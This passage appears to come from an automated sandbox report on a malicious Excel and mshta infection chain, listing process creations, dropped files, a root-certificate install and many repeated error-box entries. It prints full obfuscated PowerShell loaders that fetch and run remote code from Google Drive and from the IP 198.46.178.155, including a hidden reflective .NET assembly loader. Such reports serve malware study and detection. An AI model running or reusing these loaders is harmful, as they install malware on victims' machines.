FnLkxlbmd0aDt3VlViYXNlJysnNjRMZW5ndGggPSB3VlVlbmRJbmRleCAtIHdWVXN0YXJ0SW5kZXg7d1ZVYmFzZTY0Q28nKydtbWFuZCA9IHdWVWltYWdlVGV4dC5TdWJzdHJpbmcod1ZVc3RhcnRJbmRleCcrJywgd1ZVYmFzZScrJzY0TGVuZ3RoKTt3VlViYXNlNjRSZXZlcnNlZCA9IC1qb2luICh3VlViYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgalZUJysnIEZvckVhY2gtT2JqZWN0IHsgd1ZVXyB9KVstMS4uLSh3VlViYXNlNjRDJysnb21tYW5kLkxlbmd0aCldO3dWVWNvbW1hJysnbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcod1ZVYmFzZTY0UmV2ZXJzZWQpO3dWVWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZScrJ2ZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh3VlVjb21tYW5kQicrJ3l0ZXMpO3dWVXZhJysnaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoU3FwVkFJU3FwKTt3VlV2YWlNZXRob2QuSW52bycrJ2tlKCcrJ3dWVW51bGwsIEAoU3FwdHh0LlJTU0dSUE1TLzIyNC81NTEuODcxLjY0LjgnKyc5MS8vOnAnKyd0dGhTcXAsIFNxcGRlc2F0aXZhZG9TcXAsIFNxcGRlc2F0aXZhZG9TJysncXAsIFNxcGQnKydlc2F0aXZhZG9TcXAsJysnIFNxcENhc1BvbFNxcCwgU3FwZGVzYXRpdmFkb1NxcCwgU3FwZGVzYXRpdmFkb1NxcCxTcScrJ3BkZXNhdGl2YWRvU3EnKydwLFNxcGRlc2F0aXZhZG9TcXAsU3FwZGVzYScrJ3RpdmFkb1NxcCxTcXBkZXNhdGl2YWRvU3FwLFNxcGRlc2F0aXZhZG9TcXAsU3FwMVNxcCxTcXBkZXNhdGl2YWRvU3FwKSk7JykucmVwbGFDZSgoW2NoYVJdMTA2K1tjaGFSXTg2K1tjaGFSXTg0KSwnfCcpLnJlcGxhQ2UoKFtjaGFSXTgzK1tjaGFSXTExMytbY2hhUl0xMTIpLFtTdHJJbkddW2NoYVJdMzkpLnJlcGxhQ2UoJ3dWVScsW1N0ckluR11bY2hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GeT-VariablE '*MDR*').nAmE[3,11,2]-JOiN'') (('wVUimageUrl = Sqphttps://drive.google.com/uc?export=dow'+'nload&id=1AIVgJJJv1F6vS4sUOybnH-sDvU'+'hBYwur '+'Sqp;wVUwebClient = New-Object System.Net.WebClient;wVUimageBytes = '+'wVUwebClient.DownloadData'+'(wVUimageUrl);wVUimage'+'Text = [System.Text.Encoding]::UT'+'F8'+'.GetString(wVUimageBytes);wVUstartFlag = Sqp<<BASE64_START>>Sqp;wVUendFlag = Sqp<<BASE64_END>>Sqp;wVUstartInd'+'ex = wVUimage'+'Text.IndexOf(wVUstartFl'+'ag);wVUen'+'dIndex = wVUimageText.Inde'+'xOf(wVUendFlag);wVUstartIndex -ge 0 -'+'and wVUendIndex '+'-gt wVUstartIndex;wVUstartIndex '+'+= wVUstartFlag.Length;wVUbase'+'64Length = wVUendIndex - wVUstartIndex;wVUbase64Co'+'mmand = wVUimageText.Substring(wVUstartIndex'+', wVUbase'+'64Length);wVUbase64Reversed = -join (wVUbase64Command.ToCharArray() jVT'+' ForEach-Object { wVU_ })[-1..-(wVUbase64C'+'ommand.Length)];wVUcomma'+'ndBytes = [Sy'+'stem.Convert]::FromBase64String(wVUbase64Reversed);wVUloadedAssembly = [System.Re'+'flection.Assembly]::Load(wVUcommandB'+'ytes);wVUva'+'iMethod = [dnlib.IO.Home].Ge'+'tMethod(SqpVAISqp);wVUvaiMethod.Invo'+'ke('+'wVUnull, @(Sqptxt.RSSGRPMS/224/551.871.64.8'+'91//:p'+'tthSqp, SqpdesativadoSqp, SqpdesativadoS'+'qp, Sqpd'+'esativadoSqp,'+' SqpCasPolSqp, SqpdesativadoSqp, SqpdesativadoSqp,Sq'+'pdesativadoSq'+'p,SqpdesativadoSqp,Sqpdesa'+'tivadoSqp,SqpdesativadoSqp,SqpdesativadoSqp,Sqp1Sqp,SqpdesativadoSqp));').replaCe(([chaR]106+[chaR]86+[chaR]84),'|').replaCe(([chaR]83+[chaR]113+[chaR]112),[StrInG][chaR]39).replaCe('wVU',[StrInG][chaR]36) )"Jump to behavior
              Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysTEM32\winDowSPOWerSHEll\V1.0\PoWerShELL.eXE" "PowerSHeLL -Ex ByPasS -nOP -W 1 -c DevICecreDenTialdEploYMEnT.exe ; iex($(IeX('[SysTeM.teXt.ENcodiNg]'+[CHar]58+[cHAr]58+'uTf8.getStrIng([SysTem.cONvERt]'+[cHar]58+[ChAR]0X3a+'FrOMbaSE64sTRIng('+[ChaR]34+'JEt2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFckRFRklOaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTW9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5ieG0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTG1Ba1BEbmVhLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJmbllkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgenNXU0FXLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFYRyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImtuWGxFd0tybndRIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIVVZ4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRLdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTU1LzQyMi9zZWV0aGViZXN0dGhpbmdzd2l0aGdvb2R0aGluZ3Nmb3JnZXRtZWJhY2t3aXRoYmVzdHRoaW5ncy50SUYiLCIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyIsMCwwKTtzdEFydC1zTGVFUCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2VldGhlYmVzdHRoaW5nc3dpdGhnb29kdGhpbmdzZm9yZ2V0bWViYWNrLnZiUyI='+[ChaR]0x22+'))')))"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR2VULVZhcmlhYmxFICcqTURSKicpLm5BbUVbMywxMSwyXS1KT2lOJycpICgoJ3dWVWltYWdlVXJsID0gU3FwaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3cnKydubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlUnKydoQll3dXIgJysnU3FwO3dWVXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7d1ZVaW1hZ2VCeXRlcyA9ICcrJ3dWVXdlYkNsaWVudC5Eb3dubG9hZERhdGEnKycod1ZVaW1hZ2VVcmwpO3dWVWltYWdlJysnVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVUJysnRjgnKycuR2V0U3RyaW5nKHdWVWltYWdlQnl0ZXMpO3dWVXN0YXJ0RmxhZyA9IFNxcDw8QkFTRTY0X1NUQVJUPj5TcXA7d1ZVZW5kRmxhZyA9IFNxcDw8QkFTRTY0X0VORD4+U3FwO3dWVXN0YXJ0SW5kJysnZXggPSB3VlVpbWFnZScrJ1RleHQuSW5kZXhPZih3VlVzdGFydEZsJysnYWcpO3dWVWVuJysnZEluZGV4ID0gd1ZVaW1hZ2VUZXh0LkluZGUnKyd4T2Yod1ZVZW5kRmxhZyk7d1ZVc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIHdWVWVuZEluZGV4ICcrJy1ndCB3VlVzdGFydEluZGV4O3dWVXN0YXJ0SW5kZXggJysnKz0gd1ZVc3RhcnRGbGFnLkxlbmd0aDt3VlViYXNlJysnNjRMZW5ndGggPSB3VlVlbmRJbmRleCAtIHdWVXN0YXJ0SW5kZXg7d1ZVYmFzZTY0Q28nKydtbWFuZCA9IHdWVWltYWdlVGV4dC5TdWJzdHJpbmcod1ZVc3RhcnRJbmRleCcrJywgd1ZVYmFzZScrJzY0TGVuZ3RoKTt3VlViYXNlNjRSZXZlcnNlZCA9IC1qb2luICh3VlViYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgalZUJysnIEZvckVhY2gtT2JqZWN0IHsgd1ZVXyB9KVstMS4uLSh3VlViYXNlNjRDJysnb21tYW5kLkxlbmd0aCldO3dWVWNvbW1hJysnbmRCeXRlcyA9IFtTeScrJ3N0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcod1ZVYmFzZTY0UmV2ZXJzZWQpO3dWVWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZScrJ2ZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh3VlVjb21tYW5kQicrJ3l0ZXMpO3dWVXZhJysnaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoU3FwVkFJU3FwKTt3VlV2YWlNZXRob2QuSW52bycrJ2tlKCcrJ3dWVW51bGwsIEAoU3FwdHh0LlJTU0dSUE1TLzIyNC81NTEuODcxLjY0LjgnKyc5MS8vOnAnKyd0dGhTcXAsIFNxcGRlc2F0aXZhZG9TcXAsIFNxcGRlc2F0aXZhZG9TJysncXAsIFNxcGQnKydlc2F0aXZhZG9TcXAsJysnIFNxcENhc1BvbFNxcCwgU3FwZGVzYXRpdmFkb1NxcCwgU3FwZGVzYXRpdmFkb1NxcCxTcScrJ3BkZXNhdGl2YWRvU3EnKydwLFNxcGRlc2F0aXZhZG9TcXAsU3FwZGVzYScrJ3RpdmFkb1NxcCxTcXBkZXNhdGl2YWRvU3FwLFNxcGRlc2F0aXZhZG9TcXAsU3FwMVNxcCxTcXBkZXNhdGl2YWRvU3FwKSk7JykucmVwbGFDZSgoW2NoYVJdMTA2K1tjaGFSXTg2K1tjaGFSXTg0KSwnfCcpLnJlcGxhQ2UoKFtjaGFSXTgzK1tjaGFSXTExMytbY2hhUl0xMTIpLFtTdHJJbkddW2NoYVJdMzkpLnJlcGxhQ2UoJ3dWVScsW1N0ckluR11bY2hhUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GeT-VariablE '*MDR*').nAmE[3,11,2]-JOiN'') (('wVUimageUrl = Sqphttps://drive.google.com/uc?export=dow'+'nload&id=1AIVgJJJv1F6vS4sUOybnH-sDvU'+'hBYwur '+'Sqp;wVUwebClient = New-Object System.Net.WebClient;wVUimageBytes = '+'wVUwebClient.DownloadData'+'(wVUimageUrl);wVUimage'+'Text = [System.Text.Encoding]::UT'+'F8'+'.GetString(wVUimageBytes);wVUstartFlag = Sqp<<BASE64_START>>Sqp;wVUendFlag = Sqp<<BASE64_END>>Sqp;wVUstartInd'+'ex = wVUimage'+'Text.IndexOf(wVUstartFl'+'ag);wVUen'+'dIndex = wVUimageText.Inde'+'xOf(wVUendFlag);wVUstartIndex -ge 0 -'+'and wVUendIndex '+'-gt wVUstartIndex;wVUstartIndex '+'+= wVUstartFlag.Length;wVUbase'+'64Length = wVUendIndex - wVUstartIndex;wVUbase64Co'+'mmand = wVUimageText.Substring(wVUstartIndex'+', wVUbase'+'64Length);wVUbase64Reversed = -join (wVUbase64Command.ToCharArray() jVT'+' ForEach-Object { wVU_ })[-1..-(wVUbase64C'+'ommand.Length)];wVUcomma'+'ndBytes = [Sy'+'stem.Convert]::FromBase64String(wVUbase64Reversed);wVUloadedAssembly = [System.Re'+'flection.Assembly]::Load(wVUcommandB'+'ytes);wVUva'+'iMethod = [dnlib.IO.Home].Ge'+'tMethod(SqpVAISqp);wVUvaiMethod.Invo'+'ke('+'wVUnull, @(Sqptxt.RSSGRPMS/224/551.871.64.8'+'91//:p'+'tthSqp, SqpdesativadoSqp, SqpdesativadoS'+'qp, Sqpd'+'esativadoSqp,'+' SqpCasPolSqp, SqpdesativadoSqp, SqpdesativadoSqp,Sq'+'pdesativadoSq'+'p,SqpdesativadoSqp,Sqpdesa'+'tivadoSqp,SqpdesativadoSqp,SqpdesativadoSqp,Sqp1Sqp,SqpdesativadoSqp));').replaCe(([chaR]106+[chaR]86+[chaR]84),'|').replaCe(([chaR]83+[chaR]113+[chaR]112),[StrInG][chaR]39).replaCe('wVU',[StrInG][chaR]36) )"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1nxbdaco\1nxbdaco.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vbdaauwq\vbdaauwq.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1nxbdaco\1nxbdaco.cmdline"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vbdaauwq\vbdaauwq.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE899D022D push eax; iretd 5_2_000007FE899D0241
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE899D00BD pushad ; iretd 5_2_000007FE899D00C1

              Persistence and Installation Behavior

              barindex
              Installs new ROOT certificates
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\1nxbdaco\1nxbdaco.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\vbdaauwq\vbdaauwq.dllJump to dropped file
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
